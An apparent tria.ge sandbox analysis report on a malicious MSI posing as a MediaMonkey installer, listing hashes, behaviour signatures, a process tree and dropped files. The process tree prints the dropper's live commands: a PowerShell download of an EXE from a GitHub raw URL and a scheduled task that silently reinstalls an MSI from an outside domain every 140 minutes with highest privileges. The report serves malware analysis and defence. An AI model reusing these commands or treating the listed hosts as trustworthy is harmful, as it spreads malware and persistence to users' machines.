Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/06/2024, 10:16

General

  • Target

    adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi

  • Size

    248KB

  • MD5

    adf35549a252723b8e392ef1643134d8

  • SHA1

    0ecafc6cf721543057b7206c0816c106c919e961

  • SHA256

    8306ac8c8238290885ea335365248c0ca13f5119a7eec7b030721b1a62a33f3a

  • SHA512

    014f4bf78b0f4452580c83120267edf1a09006892a0357923aee7a83ebfa416ac233203c8889aed8ebd36a9b02b41707a3e706d5aca8124d5ce269b071ff2ec7

  • SSDEEP

    3072:d39LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDOwqQ+cxbkRqMGOG:FuH2aCGw1ST1wrL5qv

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe

Signatures

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Loads dropped DLL 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4432
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3272
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2072
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 3DD9B755726C2317F9BD1E5CF3F69ED3
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\\MediaMonkey_4.1.21.1873\run.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c "inst.cmd"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3688
          • C:\Windows\SysWOW64\net.exe
            net session
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1892
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 session
              6⤵
                PID:3792
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn "BVRKIPTS-7003" /tr "msiexec /ihttps://anicesicerom.com/1809814840 /q" /sc minute /mo 140 /rl highest /f
              5⤵
              • Creates scheduled task(s)
              PID:4408
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://player.go-mediamonkey.org/
            4⤵
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:1016
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9460546f8,0x7ff946054708,0x7ff946054718
              5⤵
                PID:1544
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
                5⤵
                  PID:5116
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4332
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
                  5⤵
                    PID:2888
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                    5⤵
                      PID:3700
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                      5⤵
                        PID:1176
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
                        5⤵
                          PID:4968
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
                          5⤵
                            PID:3068
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
                            5⤵
                              PID:3064
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1
                              5⤵
                                PID:456
                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:8
                                5⤵
                                  PID:5072
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:8
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4580
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:1
                                  5⤵
                                    PID:5148
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                                    5⤵
                                      PID:5408
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2896 /prefetch:1
                                      5⤵
                                        PID:5896
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,14725679505344645619,7750190901525694662,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
                                        5⤵
                                          PID:5540
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command "$dl = New-Object System.Net.WebClient;$dl.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1)';$f = 'monkey_4.1.21.1873.exe'; $dl.DownloadFile('https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe', $f);Stop-Process -Name powershell"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3084
                                • C:\Windows\system32\vssvc.exe
                                  C:\Windows\system32\vssvc.exe
                                  1⤵
                                  • Checks SCSI registry key(s)
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4596
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:4892
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:5084

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      4158365912175436289496136e7912c2

                                      SHA1

                                      813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

                                      SHA256

                                      354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

                                      SHA512

                                      74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      ce4c898f8fc7601e2fbc252fdadb5115

                                      SHA1

                                      01bf06badc5da353e539c7c07527d30dccc55a91

                                      SHA256

                                      bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

                                      SHA512

                                      80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      b79425886a328bd4965fe274bbd48200

                                      SHA1

                                      73cec51d70f0fd9622fe24105a71a57e71fc20d7

                                      SHA256

                                      8989805628e3b71ac7deb80fe8c4d6ca693e044cd2883fa9994957fbe6330634

                                      SHA512

                                      456b71a54a91f1b1314526f1df9c85bfa63d49a7a93e0283d4b4790551c70e993a6063e0e99307249bac77cc7f35dfd7be0318f15bd2e5aff13807296f473ca6

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      5KB

                                      MD5

                                      4a0c17da86442691fd4ade0f4eadd581

                                      SHA1

                                      b49bef25af5c5d77376093fcd7fb8e323856ddba

                                      SHA256

                                      f98e5a92661e55c2f74bcf2e4e6f034f06a8a72786a32f19a2540df55d32b48a

                                      SHA512

                                      cb92a045fcdf2e01bb11f192766baf7c45b3dc3abc259cbbadea84f1434bf2383ac38daffe400ccf54b60ce898f25bf84f37f8c477277b5776d93865ba78ac27

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      206702161f94c5cd39fadd03f4014d98

                                      SHA1

                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                      SHA256

                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                      SHA512

                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      46295cac801e5d4857d09837238a6394

                                      SHA1

                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                      SHA256

                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                      SHA512

                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      8KB

                                      MD5

                                      da4fe5f1f9691fb51486c7a769f685ef

                                      SHA1

                                      a6f4f21d47dd8976c49b9390c9691e73a932335e

                                      SHA256

                                      4119ea752b5bbcc97887678fd611cc1d9fd938178b3dbb9389b9b2f59edcde2c

                                      SHA512

                                      0638f94b3f61588b3e3f68d4e62e4d5c0e653ec0f2bbc14752b883c1e39a2703b256b7802208975913ab761abb5136392d44f3bc9fff012f3db118298806aeb1

                                    • C:\Users\Admin\AppData\Local\Temp\MediaMonkey_4.1.21.1873\inst.cmd

                                      Filesize

                                      1KB

                                      MD5

                                      48db9fdf724085cc0a8e122b3951d9a8

                                      SHA1

                                      d536d6da6e9adf5afe5c93032a8586d430b552ee

                                      SHA256

                                      a9d926d4b34c5c9498b8a9e4860e00adb614a438d9c1c641cb9a8cef598159de

                                      SHA512

                                      10fa4ea04f187fcef18648ae084a9b3a50feb602fb723a73aae2f79dfa1e9b72aaf1484890d3d5f465dbeffb3fd680fa331f1912fa11c91ee9f5234367ca5dad

                                    • C:\Users\Admin\AppData\Local\Temp\MediaMonkey_4.1.21.1873\run.cmd

                                      Filesize

                                      990B

                                      MD5

                                      0423809b82bcb00a153b8867618ba42f

                                      SHA1

                                      56e8b23af2d20885acdd0099c07da6117ee9edad

                                      SHA256

                                      aa2a5351bf923990a8d3cb3709386a6e4df6c6e5efdbfbe1198456f3a3a19a38

                                      SHA512

                                      26364e8496bbe62667faca27c83a2d39b66a2db204bb954fb7874eae577872a5046f6882423c44a72ce7dd11cd3ee49f90e1e04a8f68be3e6d825835b4c17c37

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1oj31y0s.5nv.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • C:\Windows\Installer\MSID8DC.tmp

                                      Filesize

                                      202KB

                                      MD5

                                      24fb548e48a7c771327a8f3aba6f898e

                                      SHA1

                                      3afad7f09e8827db00552f71137c40459414fc9f

                                      SHA256

                                      9e6ef372b96df65eff4358216a545e4eeb4fa5845264359de7de06443bf5fbda

                                      SHA512

                                      be1d7f7d40181f3c5d0ab21c3b2fd17043bf26c12b766bf9c6cd183580d73b8b12491862db849cf98740ea6cc92dc05a15c396ca0969bd6ab3431b581cf6169b

                                    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

                                      Filesize

                                      23.7MB

                                      MD5

                                      8f132b59e66be74dd4c8f8e9a981e183

                                      SHA1

                                      4dfaf2c445f959245dc2e538de12c7c13f453bdf

                                      SHA256

                                      89b22f573a65b6377600ff11726f4b728b2a8e61fc3892c2f90d75f98f7c287b

                                      SHA512

                                      f4a5a9474b69b5232a6e7aee7c407fe89425a6d6ff039aaca0c66397e5a6786d0f5dce1b2ce7a2cbe7dc31d3b836ef5511b823bfffa8ce4417807d0d46d52c3b

                                    • \??\Volume{8a2a71c9-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{ca357b3a-09c5-4ace-a0fd-fd04396c62ff}_OnDiskSnapshotProp

                                      Filesize

                                      6KB

                                      MD5

                                      a52ae67f38cb9678b96f9371a19cd3cb

                                      SHA1

                                      d31d6717ba986aa07abd09648551a25c015df703

                                      SHA256

                                      00179d668dc3bcec7da58b5104b461be36bde09454d124c3e5bbff075d1680c6

                                      SHA512

                                      c445878a070ceabb49a9aa06b2caf0ebfa67848b1a2151e0bfdfa577228c63b03aed84c37868acb2057dc130929bd5c1f17085d31c46e165c5c9b1b8e0f9a7b4

                                    • memory/3084-31-0x0000000005210000-0x0000000005232000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3084-56-0x00000000062F0000-0x000000000633C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/3084-64-0x0000000007930000-0x0000000007FAA000-memory.dmp

                                      Filesize

                                      6.5MB

                                    • memory/3084-35-0x0000000005CC0000-0x0000000006014000-memory.dmp

                                      Filesize

                                      3.3MB

                                    • memory/3084-25-0x00000000053C0000-0x00000000059E8000-memory.dmp

                                      Filesize

                                      6.2MB

                                    • memory/3084-79-0x00000000067D0000-0x00000000067EA000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/3084-55-0x00000000062D0000-0x00000000062EE000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/3084-33-0x0000000005C50000-0x0000000005CB6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/3084-24-0x0000000002D20000-0x0000000002D56000-memory.dmp

                                      Filesize

                                      216KB

                                    • memory/3084-32-0x0000000005BE0000-0x0000000005C46000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/3084-106-0x00000000077D0000-0x0000000007866000-memory.dmp

                                      Filesize

                                      600KB

                                    • memory/3084-107-0x0000000007780000-0x00000000077A2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3084-108-0x0000000008560000-0x0000000008B04000-memory.dmp

                                      Filesize

                                      5.6MB